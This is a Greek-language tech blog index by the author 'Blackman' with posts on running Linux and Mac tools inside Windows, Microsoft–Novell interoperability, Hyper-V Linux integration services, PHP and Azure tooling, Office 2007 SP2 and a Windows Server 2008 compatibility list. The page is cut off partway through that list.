Jump to content

Blackman

Members
 View Profile  See their activity

  • Posts

    1970

  • Joined

  • Last visited

  • Days Won

    15

 Content Type 

Blog Entries posted by Blackman

  1. Blackman
    Μέχρι τώρα, πολλοί από εμάς όταν χρειαζόμασταν να τρέξουμε κάποιο άλλο λειτουργικό προχωρούμε στην λύση Virtual Machine. Στο παρελθόν είχα αναφέρει το Wubi, σαν μία λύση εγκατάσταση Ubuntu στα Windows, δίνοντας την ευκολία στο χρήστη του install/uninstall, χωρίς να χρειάζεται να ρυθμίσει κάτι ιδιαίτερο για partitions κλπ. Το συγκεκριμένο μας δίνει full λειτουργικότητα της συγκεκριμένης διανομής, αλλά υστερεί  στο ότι δεν μπορεί να δουλεύει παράλληλα με την Windows εγκατάσταση μας.

    <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
     

    Στην αντίθετη περίπτωση των virtual machines, έχουμε άλλα θέματα όπως τους πόρους του συστήματος, τις σχετικές ρυθμίσεις για το δίκτυο και άλλα θέματα που έχουμε όλοι αντιμετωπίσει κατά καιρούς.


     

    Οι παρόντες στο Cybercrime Security Forum που είχε γίνει πέρυσι, θα θυμούνται ότι πολλά από τα εργαλεία που αναφέρθηκαν έτρεχαν κυρίως είτε σε Linux ή σε Macintosh. Οι εναλλακτικές σε windows tools ήταν κατά πολύ περιορισμένες. Προσωπικά στο παρελθόν υπήρξαν στιγμές που χρειάστηκα πραγματικά κάποιο εργαλείο από αυτά που υπάρχουν μόνο σε linux, αλλά δεν μπορούσα να τα τρέξω στο σύστημα μου (αχ αυτό το snort). Η αλήθεια είναι όμως ότι λύσεις υπάρχουν και μιλάμε για λύσεις που μας δίνουν αυτή την δυνατότητα (του να έχουμε linux ή mac tools) μέσα στα windows.

    Μιλάμε για εγκατάσταση προγράμματος, σαν όλα τα υπόλοιπα, αλλά ανεβάζουν την λειτουργικότητα των Windows σε άλλο επίπεδο. Αλλά γιατί να μην σας δείξω κάποιες από αυτές τις εναλλακτικές;


     

    GNU + Cygnus + Windows = CYGWIN (under testing)


    Ανέφερα Cybercrime Security Forum…


    Χμ, πόσοι είδαν το CDάκι που οι ομιλητές μοίρασαν στον κόσμο; Αυτοί που το είδαν, προφανώς ξέρουν ότι εμπεριείχε και το συγκεκριμένο σύστημα. Το Cygwin είναι ένα linux-like περιβάλλον για τα windows και το οποίο προσφέρει μία συλλογή εργαλείων για άμεση χρήση. Όμως μην περιμένετε να δείτε κλασικές εφαρμογές linux να τρέχουν έτσι απλά (σε περίπτωση που δεν εμπεριέχετε). Σε αυτή την περίπτωση αυτό το application θα πρέπει να γίνει rebuild from source για να τρέξει στα Windows (μέσω του Cygwin).


    Γενικά πρέπει να γνωρίζετε τα εξής:

    ·  Cygwin is not a way to run native linux apps on Windows. You have to rebuild your application from source if you want it to run on Windows.


    ·  Cygwin is not a way to magically make native Windows apps aware of UNIX ® functionality, like signals, ptys, etc. Again, you need to build your apps from source if you want to take advantage of Cygwin functionality.


    Τέλος θα πρέπει να ξέρετε ότι το συγκεκριμένο είναι ακόμα σε beta.



    coLinux = Cooperative Linux (tested)


    Άλλη μία αντίστοιχη λύση είναι και το coLinux και μπορεί και συνεργάζετε και με το Cygwin. Στην παρούσα κατάσταση αυτό που δίνει στον χρήστη των windows είναι να λειτουργεί την Ιαπωνέζικη έκδοση του KNOPPIX μέσα από το τρέχον λειτουργικό σύστημα.


     

    andLinux (tested)


    Βασισμένο στο coLinux, αλλά ουσιαστικά τρέχοντας Ubuntu, είναι ίσως η καλύτερη λύση αυτή την στιγμή. Κύριος λόγος δεν είναι άλλος από την ευχρηστία που εμφανίζει το Ubuntu. Τρέχει χωρίς πρόβλημα σε όλα τα συστήματα της Microsoft, συμπεριλαμβανομένων και των Windows 7. Ο μοναδικός περιορισμός που έχει το συγκεκριμένο είναι, εν αντιθέσει με τα προαναφερθέντα, ότι τρέχει ΜΟΝΟ σε 32bit συστήματα.

    Το συγκεκριμένο είναι και το σύστημα που έχω δουλέψει περισσότερο από τα υπόλοιπα και πραγματικά με κάλυψε απόλυτα. Η δυνατότητα της εκτέλεσης του Synaptic και το κατέβασμα και την εγκατάσταση ουσιαστικά ότι προγραμμάτων μπορείτε να φανταστείτε, το έκανε ένα πολύ δυνατό εργαλείο, ειδικότερα με το συνδυασμό των windows. Η δυνατότητα χρήσης διάφορων repositories (aka repos) υπάρχει και στο coLinux, αλλά απλά το Ubuntu έχει μεγαλύτερη γκάμα από το Knoppix.

    Ένα από τα αγαπημένα μου ήταν η χρήση της κονσόλας και έχοντας εγκαταστήσει τα απαραίτητα εργαλεία σε συνδυασμό και τα εργαλεία των windows πχ powershell, sysinternals, η αίσθηση ήταν απερίγραπτη.







     

     

    SoftMac XP Suite version 8.20 (under testing)


    Αυτοί που θέλουν να τρέχουν Macintosh μέσα από τα windows η λύση ακούγετε στον όνομα SoftMac XP Suite. O costasppc πιθανόν να το ξέρει το συγκεκριμένο και θα ήταν ενδιαφέρον αν μπορούσε να εκφέρει γνώμη. Το σύστημα υπάρχει αρκετό καιρό και είναι δοκιμασμένο μέχρι και Windows Vista. Η διαφορά με τις λύσεις linux που αναφέρθηκαν, είναι ότι σε αυτή την περίπτωση μιλάμε για emulator του συστήματος μέσα στα windows.




    Αντίστοιχα με το SoftMac, ρίξτε και μία ματιά στο Basilisk II JIT.


    bochs (not tested)


    Ένας cross-platform emulator που μπορεί να εκτελέσει όλα τα λειτουργικά συστήματα (δεν έχει δοκιμαστεί σε windows 7)






    TopologiLinux (not tested)


    Ένα ακόμα σύστημα, το οποίο είναι ένας συνδυασμός του wubi και του andLinux. Κατά την εγκατάσταση δημιουργείτε ένα μόνο αρχείο, αλλά πλέον το λειτουργικό μπορεί και τρέχει μέσα από τα Windows. Η διαφορά με τo andLinux και η ομοιότητα με το CoLinux είναι ότι το συγκεκριμένο ανοίγει ολόκληρο το περιβάλλον του linux (full desktop). Άλλη διαφορά είναι ότι αυτό είναι βασισμένο στο slackware και δίνει την δυνατότητα στον χρήστη να επιλέξει τον πυρήνα που θέλει να τρέχει το TopologiLinux (X, KDE, Gnome).





    Portable Ubuntu for windows (not tested)


    Η απάντηση στην περίπτωση του wubi και μία άμεση εναλλακτική του andLinux, ακούει στο όνομα Portable Ubuntu. Η διαφορά είναι ότι το συγκεκριμένο παίζει και σε 64bit συστήματα (πράγμα που δεν κάνει το andLinux) και έχει δοκιμαστεί και στα Windows 7.



     









     
    SUA …για να μην ξεχνιόμαστε (tested)


    Μην ξεχνάτε ότι αντίστοιχη λύση προσφέρει και η Microsoft με το Subsystem for UNIX-based Applications, το οποίο είχε παρουσιαστεί από αυτό εδώ το blog. Είναι γραμμή εντολής και δεν δίνει ότι τα προαναφερθέντα, αλλά αν πχ έχετε κάποιο πρόγραμμα από τα γνωστά, τότε δεν θα έχετε πρόβλημα να το τρέξετε μέσω του SUA. Δεν μπορείτε όμως να κάνετε εγκατάσταση (τουλάχιστον προσωπικά δεν βρήκα κάτι), αλλά να κάνετε βασικά πράγματα. Το συγκεκριμένο παίζει σε εκδόσεις ultimate και enterprise.



     

    -----------------------------------------------------------------------------

    Επίλογος

    Αν θέλετε να χρησιμοποιήσετε κάποιο από τα προαναφερθέντα, τότε η επιλογή είναι δική σας, το σίγουρο είναι ότι θα βρείτε αρκετά ενδιαφέρουσα πράγματα με την χρήση των παραπάνω. Απλά να αναφέρω ότι από την προσωπική χρήση είχα κάποια (μικρά) θεματάκια στα Vista και στα 7 με το UAC, αλλά δεν νομίζω να δυσκολευτείτε να τα ξεπεράσετε.

     

    Κατεβάστε τα:

    Cygwin

    CoLinux

    andLinux

    SoftMac XP Suite

    bochs

    TopologiLinux

    Portable Ubuntu

    Subsystem for UNIX-Based Applications (Utilities & SDK) (το βασικό κομμάτι γίνεται εγκατάσταση από τα Windows Features)
  2. Blackman
    Το άκρως επιτυχημένο event που οργάνωσε το Autoexec.gr με τίτλο IT Pro Connections είναι παρελθόν. Σε αυτό το event μου δόθηκε η πρώτη μου ευκαιρία να παρουσιάσω κάτι σε τόσο απαιτητικό κοινό. Πέραν της ικανοποίησης κάτι τέτοιου, καθώς είναι και ψώνιο μου το να εκτίθεμαι μπροστά σε κόσμο, ήρθε μία ακόμα αναγνώριση αυτής της προσπάθειας.
    Η εταιρεία που εργάζομαι κάθε χρόνο βραβεύει τους υπαλλήλους της που κάνουν κάτι …παραπάνω. Είτε αυτό είναι στην εκπαίδευση (είχα πάρει το πρώτο όταν είχα στα χέρια μου το μεταπτυχιακό μου, αλλά και αργότερα όταν έγινα MCP και μετά MCSA), είτε σε κάποια πρόταση βελτίωσης, είτε κάπου αλλού. Για το σκοπό αυτό έχει κατηγοριοποιήσει κάποια πράγματα στα οποία έχουν αποφασίσει να βραβεύουν τους υπαλλήλους που κάνουν κάτι το αντίστοιχο.
    Φέτος αρχικά είχα απογοητευτεί που δεν είχα βραβευτεί μαζί με όλους τους υπόλοιπους για την αναβάθμιση του τίτλου MCSA μου σε WS 2008. Αλλά έπρεπε να περιμένω μέχρι το τέλος για να καταλάβω ότι δεν με είχαν στην απ’ έξω.
    Έτσι είχα την τιμή να πάρω το βραβείο ΠΡΩΤΟΒΟΥΛΙΑΣ για την επιτυχημένη παρουσίαση μου στο IT Pro Connections και την γενικότερη ενασχόληση μου με το κομμάτι του Interoperability, αλλά και τις συνεχόμενες πιστοποιήσεις πάνω στα συστήματα της Microsoft. Φυσικά το βραβείο το συνόδευε και ένα πολύ καλό δώρο.
    Δεν είναι το βραβείο, αλλά η αναγνώριση σε αυτό που κάνει κάποιος. Έτσι και εμένα το συγκεκριμένο απλά μου δίνει μία επιπλέον ώθηση (όχι ότι την χρειαζόμουν, αλλά μου μεγαλώνει λίγο το χαμόγελο) για να συνεχίσω να προσφέρω και να ασχολούμαι με πράγματα που μου αρέσουν τόσο πολύ.
    Φυσικά δεν γινόταν να μην το μοιραστώ με όλους εσάς. Άλλη μία φορά να ευχαριστήσω το Autoexec.gr και τον Νάσο Κλαδάκη, για την τιμή που μου έκαναν και στην συνέχεια της Διοίκηση της εταιρείας Βάμβας που εργάζομαι για την επιβράβευση αυτής της προσπάθειας.
    Γιώργος “Blackman” Καββαλάκης
    Υ.Γ. Τα καλά να λέγονται!!!
  4. Blackman
    Ανακοινώθηκε η RC έκδοση των Linux Integration Services για το Hyper-V. (Ακούς Βαγγέλη) Τα καλούδια που προσέφεραν αυτά τα services μέχρι την beta έκδοση, ήταν τα εξής:
    Driver support for synthetic devices: The Linux Integration Services support the synthetic network controller and the synthetic storage controller that were developed specifically for Hyper-V.
    Fastpath Boot Support for Hyper-V: Boot devices now take advantage of the block Virtualization Service Client (VSC) to provide enhanced performance.
    Timesync: The clock inside the virtual machine will now remain synchronized with the clock on the host.
    Integrated Shutdown: Virtual machines running Linux can now be shut down from either the Hyper-V Manager or the VMConnect application using the “Shut Down” command.
    Symmetric Multi-Processing (SMP) Support: Supported Linux distributions can now properly use up to 4 virtual processors (VP) per virtual machine.
    Στην νέα RC έκδοση προστέθηκαν και τα παρακάτω πολύ χρήσιμα
    Heartbeat: Allows the host to detect whether the guest is running and responsive.
    Pluggable Time Source: A pluggable clock source module is included to provide a more accurate time source to the guest.
    Οπότε πλέον το σύστημα γνωρίζει τι κάνει το linux host, ενώ διάφορα θεματάκια που μπορεί να δημιουργηθούν σε ένα σύστημα με σχέση το ρολόι του, πλέον εξαλείφεται και αυτό.
    Αν θέλετε να τα κατεβάσετε...be my guest (όσοι μπορούν να μπουν στο connect)
    https://connect.microsoft.com/site495/Downloads
    και μην ξεχάσουμε ότι επίσημα υποστηρίζονται τα παρακάτω λειτουργικά:
    Novell SUSE Linux Enterprise Server 10 SP3, SUSE Linux Enterprise Server 11, και Red Hat Enterprise Linux 5.2 / 5.3 / 5.4 / 5.5.
    Ανεπίσημα, κάντε τις δοκιμές σας...αν και οι περισσότεροι έχουμε δοκιμάσει επιτυχώς CentOS . Για ότι άλλο θα πρέπει να βάλετε τις φόρμες εργασίας για να μπείτε στις 'αγωνιστικές' δοκιμές των όποιων άλλων διανομών μπορεί να παίξουν σε Hyper-V.
    Σύντομα στην RTM...
     
     
  5. Blackman
    Είναι δεδομένο ότι τα πράγματα εξελλίσονται γοργά και σε ρυθμούς τέτοιους που η συνύπαρξη δύο διαφορετικών πλατφόρμων οι οποίες να μπορούν και συνεργάζονται αρμονικά εδώ και αρκετό καιρό θεωρείται γεγονός. Η Microsoft με την Novell έχουν δημιουργήσει πριν λίγα χρόνια μία στρατηγική συνεργασία με σκοπό την συνύπαρξη windows & linux.

    Πάνω σε αυτό το πεδίο συνεργασίας οι δύο αυτές εταιρείες ετοιμάζουν για τρίτη φορά ένα webcast με σκοπό να δείξουν πως προχωράνε τα πράγματα στο κομμάτι interoperability. Όλα αυτά θα έχουμε την δυνατότητα να τα παρακολουθήσουμε σε ένα πραγματικά interactive session, όπου θα δοθούν απαντήσεις από κορυφαία στελέχη και των δύο εταιρειών ειδικευμένα στο κομμάτι αυτό.

    Τα κύρια θέματα που θα καλυφθούν είναι η μεγιστοποίηση των εξής:

    Virtualization and consolidation
    Security and identity management
    Web Services for physical and virtual servers
    Document Format Compatibility
    όπως και διάφορα άλλα.

    Δεν έχετε να κάνετε τίποτα άλλο από το να δηλώσετε συμμετοχή και να παρακολουθήσετε αυτό το ενδιαφέρον webcast.

    Περισσότερες πληροφορίες και για εγγραφή

    http://www.eseminarslive.com/c/a/IT-Management/MicrosoftNovell093009/

    Η ώρα της παρουσίασης είναι 12pm pasific, οπότε στις 7μμ ώρα Ελλάδας

    Enjoy!

     

    Υ.Γ. Ωραία πράγματα. Σήμερα στις 29/9 webcast Windows 7 και αύριο 30/9 Interoperability. Τι άλλο να ζητήσει κάποιος

     
  6. Blackman
    Ήταν πριν τρία χρόνια όταν η Microsoft ανακοίνωσε την συνεργασία της με την Novell. Στο άκουσμα του παραπάνω όλοι κατάλαβαν ότι όλα κινούνται γύρω από την επιχειρηματική λογική. Τι σημαίνει αυτό; Ότι όλα είναι Business baby…
    Δύο εταιρείες που πολλές φορές είχαν έρθει σε ανοιχτή κόντρα, κυρίως για την μονοπωλιακή πολιτική της Microsoft, ήταν πλέον συνεργάτες. Τι έγινε όμως για να φτάσουμε ως εδώ; Η απάντηση είναι… όλοι εμείς. Πελάτες με περίπλοκες εγκαταστάσεις, με windows & linux λειτουργικά, με αρκετό open source και πολλά πολλά άλλα.
    Πολλές εταιρείες αποφάσιζαν να χρησιμοποιήσουν πχ έναν Linux email server, χωρίς όμως ποτέ να υπολογίσουν το όποιο κόστος για να καταφέρουν όλο το παραπάνω να δουλέψει με το υπόλοιπο δίκτυο. Έτσι είχαμε εγκαταστάσεις παρατημένες, γιατί ο πρώην admin ήξερε να χρησιμοποιεί linux, αλλά ο νέος έχει γνώσεις για Exchange και το αφεντικό δεν θέλει να γίνει migration (άλλη περίπτωση αυτή) αλλά το σύστημα να δουλεύει. Ο νέος admin στην συνέχεια έχει γίνει μοναχός στο Άγιο Όρος από τις προσευχές για να μην πάθει τίποτα ο mail server.
    Σε αυτό το σημείο ήρθε η συνεργασία της Microsoft με την Novell. Έτσι συμφώνησαν να αναπτύξουν προϊόντα σε ανοιχτά πρότυπα, έτσι ώστε όλοι εμείς να μην ανησυχούμε στο πως μπορούμε να δουλέψουμε διαφορετικές πλατφόρμες, ενοποιημένες σε ένα σύστημα.
    Η αρχική συνεργασία των δύο ήταν πάνω στα εξής 4: Virtualization,Standards Based Systems Management, Standards Based Identity and Federation, και Document Format Compatibility. Στην συνέχεια η συνεργασία προχώρησε περεταίρω και στα εξής 3: Moonlight, Linux Management for MS System Center, και Windows Accesibility.
    Virtualization (που είσαι Hyper-Vaggelaki;)
    Η συνεργασία σε επίπεδο Virtualization είχε να κάνει με το να εκμεταλλευτούν και οι δύο εταιρείες τον virtualization Hypervisor της άλλης (ένα χιαστί πράγμα δηλαδή). Αυτό έγινε εφικτό εφαρμόζοντας ένα σετ από VM adapters σχεδιασμένους για την επικοινωνία των XEN Visor και Windows Hyper V. Αυτοί οι λεγόμενοι Hyper-call adapters, μαζί με αντίστοιχους drivers για το storage και τις σχετικές συσκευές, μπήκαν σε ένα πακέτο και δόθηκαν στους πελάτες ως Linux Integration Components (Download). Αυτά τα components μπορεί κάποιος να τα κατεβάσει και να τα βάλει στο Guest λειτουργικό, όπου στην συνέχεια με μία απλή επανεκκίνηση ο χρήστης μπορεί να έχει όλα τα εξτρά (“additional performance of being and enlightened or para-virtualized guest” όπως τα αναφέρει η MS). Φυσικά στην περίπτωση μας, δεν μιλάμε γενικά για Linux, αλλά πιο συγκεκριμένα για το SUSE Linux το οποίο και υποστηρίζει η Novell και ουσιαστικά γίνεται το μοναδικό Linux λειτουργικό που υποστηρίζεται επίσημα στον Hyper-V. Πρόσφατα, η Microsoft προσέφερε στην κοινότητα του Open Source τα συγκεκριμένα components μέσω του GPL V2 License (όπου έχετε ξαναδιαβάσει και σε αυτό το blog).
    Το τελευταίο διάστημα τα πράγματα προχωράνε σε λύση Virtualization V2. Το μεγάλο ατού σε αυτό, είναι ότι πλέον το SUSE Linux όχι απλά υποστηρίζεται στον Windows Server 2008 R2, αλλά διατυμπανίζουν πλέον και την δυνατότητα του Live Migration. Που φτάσαμε; Πλέον όλοι θα μπορείτε να κάνετε ‘βόλτες’ από μηχάνημα σε μηχάνημα χωρίς downtime. (Που είσαι ρε Βαγγέλη Με αυτό τον τρόπο η MS κατάφερε να κλείσει το κενό που είχε με τον κύριο αντίπαλο της σε θέματα virtualization, που λέγετε VMWARE.

    Διαχείριση
    Σε αυτό το κομμάτι, οι δύο εταιρείες είχαν αρχικά συμφωνήσει προσκολλήσουν στο standard του WSMan πρωτοκόλλου για την διαχείριση συστημάτων (Systems Management). Έτσι και οι δύο εταιρείες χρησιμοποίησαν το παραπάνω standard για server monitoring αντίστοιχα στα Microsoft System Center Operations Manager και της Novell το Zenworks Management Platform. Αλλά αυτό δεν είναι το σημείο στο οποίο πρέπει να μείνουμε, καθώς από το 2008 δημιουργήθηκε το Linux Management Pack (download) από την Novell για να εγκατασταθεί μαζί με το System Center της Microsoft. Καλό ε; Έτσι με αυτό το πακέτο, μέσω του System Center ο admin θα μπορούσε να παρακολουθήσει 7 κύρια service όπως: Samba, Bind/DNS, DCHP, LDAP, CUPS, Firewall, και NFS. Φυσικά ο περιορισμός του συγκεκριμένου πακέτου είναι ότι επίσημα υποστηρίζει μόνο SUSE Linux.

    Identity and Federation
    Στο συγκεκριμένο κομμάτι, η συνεργασία των δύο εταιρειών έγινε πραγματικότητα μέσω των Active Directory Federation Service της Microsoft και του Access Manager της Novell. Και τα δύο αυτά προϊόντα συνεργάζονται μέσω των WS Federation Protocols, συμπεριλαμβανομένων και των WS Trust and WS Security. Με αυτό το μοντέλο οι πελάτες μπορούν να εκμεταλλευτούν εφαρμογές όπως το Microsoft SharePoint ή κάποια άλλα. Η προσπάθεια που γίνεται αυτή την στιγμή είναι η δημιουργία ενός πακέτου που θα επεκτείνει το SharePoint και σε περιβάλλοντα που δεν χρησιμοποιούν Active Directory.

    Moonlight
    Ακόμα ένα πράγμα που έχετε διαβάσει σε αυτό το blog, έχει να κάνει με την δημιουργεία του moonlight, που δεν είναι τίποτα άλλο από την δυνατότητα ύπαρξης του Silverlight στο Linux. Η συνεργασία σε αυτό το κομμάτι, έφερε το Silverlight και στους open source Browsers. Πλέον το Moonlight 2 είναι διαθέσιμο.
    Office Format Compatibility
    Επίσης ένας τομέας που έχει συζητηθεί και σε αυτό το blog, οπότε δεν θα επεκταθώ και έχει να κάνει με την συμβατότητα του Open Office και του MS Office και των format που αυτά χρησιμοποιούν. Προσωπικά πιστεύω ότι έχουν γίνει βήματα σωστά, αλλά υπάρχουν ακόμα αρκετά να γίνουν ώστε να μπορεί κάποιος να μιλήσει για πλήρης συμβατότητα.
    Accesibility Collaboration
    Ένα project το οποίο είναι εν εξελίξει και θα επιτρέπει το UIA (User Interface AUtomation) framework να λειτουργεί αρμονικά μέσα στα Linux Accessibility Projects.
    Επίλογος
    Η συνεργασία των δύο προχωράει και από αυτά που έχουν συμφωνηθεί, έχουμε και άλλα να δούμε. Περισσότερες από 475 μεγάλες εταιρείες παγκοσμίως βρίσκονται στο interop-πελατολόγιo των MS & Novell. Τα πράγματα προχωράνε προς αυτή την κατεύθυνση και οι σκληροπυρηνικοί linuxάδες απλά θα πρέπει να ξεκινήσουν να νιώθουν λίγο καλύτερα με την MS ή M$ όπως συνήθως την γράφουν. Όπως και να έχει το πράγμα, μην ξεχνάμε ότι όλα είναι business και τουλάχιστον εμείς οι χρήστες είμαστε αυτοί που έχουμε κέρδος από κάτι σαν και αυτό.
    Τα σχόλια; Δικά σας…
  7. Blackman
    Ανακοινώθηκε η έκδοση των Microsoft Drivers for PHP για SQL Server 2.0, ένα μεγάλο και σημαντικό release όπως αναφέρεται σε διάφορα blog posts της Microsoft.
    Το μεγάλο highlight της έκδοσης είναι η προσθήκη του PDO_SQLSRV driver που όπως γίνεται κατανοητό προσθέτει υποστήριξη σε PHP Data Objects (PDO). Με αυτή την προσθήκη δίνεται η δυνατότητα σε διαδεδομένες PHP εφαρμογές να χρησιμοποιήσουν τον PDO data access τρόπο για να διαλειτουργήσουν με μία βάση SQL Server και φυσικά να εκμεταλλευτούν όλα τα features που αυτός δίνει. Οι δύο drivers PDO_SQLSRV και SQLSRV δίνουν δυνατότητα στους developers να συνδέονται εύκολα KAI στο ‘σύννεφο’ και να χρησιμοποιούν εκείνη την βάση δεδομένων γνωστή και ως SQL Azure.


    Μπορείτε να διαβάσετε όλες οι λεπτομέρειες από το blog της ομάδας του SQL Server Driver for PHP, το οποίο γράφει ο Ashay Chaudhary (Program Manager στην Microsoft).
    http://blogs.msdn.com/b/sqlphp/archive/2010/08/04/microsoft-drivers-for-php-for-sql-server-2-0-released.aspx

    ενώ προηγούμενη σχετική αναφορά στο θέμα είχε γίνει στο
    http://autoexec.gr/blogs/blackman/archive/2010/04/20/sql-server-driver-for-php-2-0.aspx

  8. Blackman
    Έχω γράψει κατά καιρούς για διάφορα ωραία που βγαίνουν και έχουν σχέση με το Interoperability και ότι σχετίζεται με αυτό. Σε αυτό το άρθρο θα σας παραθέσω σχετικά Links που σχετίζονται με αναβαθμίσεις σε πράγματα που έχω ήδη γράψει και είχαν εμφανιστεί νωρίτερα, αλλά και κάποια νέα πράγματα που μπήκαν στο παιχνίδι..
    Let's begin…
    Τον Ιούλιο ο γενικός διευθυντής του Interoperability Strategy της Microsoft Jean Paoli πριν πάει στο OSCON (O’Reilly Open Source Convention) είχε γράψει ένα blog με θέμα
    Interoperability Elements of a Cloud Platform Outlined at OSCON
    Τα πράγματα που αναφέρει είναι τρομερά ενδιαφέροντα και σας δίνει καλύτερη εικόνα για το πώς προχωράει η Microsoft στο κομμάτι του Interoperability.
    Σε εκείνη την παρουσία του Jean Paoli στην OSCON είχε την ευκαιρία να δείξει σε Live demos πράγματα όπως αυτά που έχω ξαναγράψει, αλλά στις τελευταίες τους αναβαθμίσεις καθώς και κάποιες νέες προσθήκες:
    Windows Azure Companion – September 2010 Community Technology Preview(CTP)– ένα νέο εργαλείο που έχει σκοπό να προωθήσει την απροβλημάτιστη λειτουργία κατά την εγκατάσταση και παραμετροποίηση PHP platform-elements (PHP runtime, extensions) και Web εφαρμογών που τρέχουν σε Windows Azure. Το πρώτο Preview εστιάζει στην PHP, αλλά μπορεί να επεκταθεί για να χρησιμοποιηθεί στο deployment οποιουδήποτε open source component ή εφαρμογής που μπορεί και τρέχει σε Windows Azure. Στο Link περισσότερες πληροφορίες.
    Windows Azure Tools for Eclipse for PHP - September 2010 Update– ένα plugin για τους developers που δουλεύουν σε περιβάλλον Eclipse μέσω του οποίου μπορούν να δημιουργήσουν, να δοκιμάσουν και να κάνουν deploy εφαρμογές που είναι για Windows Azure Windows Azure Command-line Tools for PHP – September 2010 Update–το αντίστοιχο εργαλείο με το προηγούμενο αλλά σε γραμμή εντολής Windows Azure SDK for PHP– Version 2.0 – ένα ακόμα όπλο για τους developers που τους επιτρέπει να χρησιμοποιήσουν τα σχετικά Windows Azure Services (blobs, tables & queues) στις web εφαρμογές τους είτε προορίζονται για Windows Azure είτε για κάποιο άλλο σύννεφο. Πλέον στην έκδοση 2.0. Στην συνέχεια στην σελίδα των Windows Azure, υπάρχει το Windows Azure Platform and Interoperability που ουσιαστικά φέρνει σε μία σελίδα μαζεμένα ότι συζητάμε κατά καιρούς, με διαθέσιμα όλα τα εργαλεία που προωθούν το interoperability.

    Τέλος, όλα αυτά, αλλά και άλλα πολλά, όπως το πώς κάνετε εγκατάσταση το Windows Azure Companion, πώς να εγκαθιστάτε εφαρμογές κλπ θα τα δείτε στο καταπληκτικό blog post του Maarten Balliauw (.NET technical consultant στην RealDolmen)
    Introducing Windows Azure Companion – Cloud for the Masses?
    Stay Tuned…
  9. Blackman
    Πριν λίγες μέρες η Microsoft ανακοίνωσε τον νέο SP2 για το Office 2007, το οποίο περιέχει διάφορες βελτιώσεις στα applications του Office σε θέματα performance και όχι μόνο (ειδικά στο Sharepoint Server και στο Outlook, ισχυρίζονται ότι οι βελτιώσεις στην ταχύτητα είναι αισθητές).



    Αλλά αυτό που κάνει την διαφορά σε αυτό το πακέτο είναι ότι πλέον το SP2 υποστηρίζει PDF & ODF. Τα PDF (Portable Document Format) αρχεία τα γνωρίζετε όλοι, τα ODF (Open Document Formula) όμως όχι τόσοι πολλοί. Τουλάχιστον δεν τα ξέρουν όσοι δεν έχουν δουλέψει σε Open Office. Οπότε μιλάμε για ένα release που (θα χρησιμοποιήσω την αγαπημένη μου λέξη) αν μη τι άλλο χαρακτηρίζετε από την δυνατότητα διαλειτουργικότητας (interoperability) με δύο εφαρμογές που μέχρι τώρα δούλευαν μόνο από την μία πλευρά. Για όσους δεν γνωρίζουν, με το Acrobat Professional μπορείς να σώσεις pdf πχ σε .doc, ενώ από το Open Office μπορείς να σώσεις σε όποιο τύπο αρχείου Microsoft Office θες. Το ανάποδο δεν γινόταν. Πλέον με τα όσα ισχυρίζετε η Microsoft, αυτό πλέον γίνεται για τα PDF και εν μέρη με το ODF (εν μέρη για το OpenDocument έχει και άλλου τύπου αρχεία ods,odt Κλπ).

    Επίσης σε συνέχεια του άρθρου που είχα γράψει για τον Office SharePoint Server 2007, το νέο SP έρχεται να προσθέσει την υποστήριξη read-only content βάσεων δεδομένων, βελτιώσεις σε authentication form-based και επιπλέον μία STSADM εντολή (όσοι έχουν δουλέψει με το SharePoint στο παρελθόν την γνωρίζουν καλά) που δίνει την δυνατότητα στους administrators να κάνουν scan σε sites που χρησιμοποιούν το feature των μεταβλητών, για τυχόν λάθη στις σελίδες αυτές. Το νέο SP υπόσχεται καλύτερη υποστήριξη στις καινούριες εκδόσεις του Firefox (go Microsoft).

    Φυσικά το θέμα των νέων τύπως αρχείων (PDF & ODF) υποστηρίζονται και στον Office SharePoint Server, όπως επίσης και το Open XML που το προσφέρει με τον αντίστοιχο Open XML Format External File Converter. Το τελευταίο δίνει την δυνατότητα σε developers να μετατρέψουν έγγραφα third-party σε αντίστοιχα του Office και για να το εξηγήσω καλύτερα αυτό θα αναφέρω το παρακάτω που διάβασα

    This means Office will support most government-preferred formats, and can easily be made to support any others that come along.

    Το Outlook 2007 SP2 φέρεται να είναι 26% πιο γρήγορο από το SP1 σε μία καθημερινή χρήση e-mail tasks, 35% με μεγαλύτερα mailboxes σύμφωνα με την Jane Liles, group program manager, Office Sustained Engineering. "Users will experience considerable responsiveness and speed improvements on common, day-to-day operations like launching, synchronizing and searching. We were excited to be able to act on as much of the customer feedback as we did," πρόσθεση η Liles.

    Κατεβάστε το SP2 από εδώ.
  10. Blackman
    Βάλατε Server 2008 ή ΘΑ βάλετε, αλλά δεν ξέρετε τι θα παίζει και τι δεν θα παίζει από τα υπόλοιπα προγράμματα που έχετε ήδη αγορασμένα, αλλά δεν είστε σε θέση (εν μέσω κρίσης) να προχωρήσετε εσείς ή το αφεντικό σας σε αναβάθμιση και αυτών των προγραμμάτων;

    Πριν κάνετε κάποια κίνηση η Microsoft ήδη έχει βγάλει κάποιες σχετικές λίστες για το τι παίζει και τι δεν παίζει σε Microsoft Windows Server 2008. Φυσικά σε πρώτη φάση μιλάμε για τις εφαρμογές της ίδιας της εταιρείας και στην συνέχεια στην συμβατότητα της με άλλα συστήματα ή εφαρμογές.

    Συμβατές Microsoft εφαρμογές (για την ώρα)



    Microsoft Application Virtualization 4.5


    Microsoft Application Virtualization 4.5 Beta


    Microsoft Commerce Server 2007 Service Pack 2 (SP2)


    Microsoft Dynamics AX 2009


    Microsoft Dynamics CRM 4.0


    Microsoft Dynamics GP 10 Service Pack 2


    Microsoft Dynamics NAV 5.0 Service Pack 1 (SP1)


    Microsoft Dynamics NAV 4.0 Service Pack 3 (SP3)


    Microsoft Dynamics NAV 2009


    Microsoft Dynamics SL 7 FP1


    Microsoft Exchange Server 2007 Service Pack 1 (SP1)


    Microsoft Forefront Client Security***


    Microsoft Forefront Security for Exchange Server with Service Pack 1 (SP1)


    Microsoft Forefront Server Security for SharePoint with Service Pack 2 (SP2)


    Microsoft Host Integration Server 2006 Service Pack 1 (SP1)


    Microsoft Office Forms Server 2007 Service Pack 1 (SP1)


    Microsoft Office Groove Server 2007 Service Pack 1 (SP1)


    Microsoft Office PerformancePoint Server 2007 Service Pack 1 (SP1)


    Microsoft Office PerformancePoint Server 2007 Service Pack 1 (x86)


    Microsoft Office PerformancePoint Server 2007 Service Pack 1 (x64)


    Microsoft Office Project Portfolio Server 2007 Service Pack 1 (SP1)*


    Microsoft Office Project Server 2007 Service Pack 1 (SP1)


    Microsoft Office SharePoint Server 2007 Service Pack 1 (SP1)


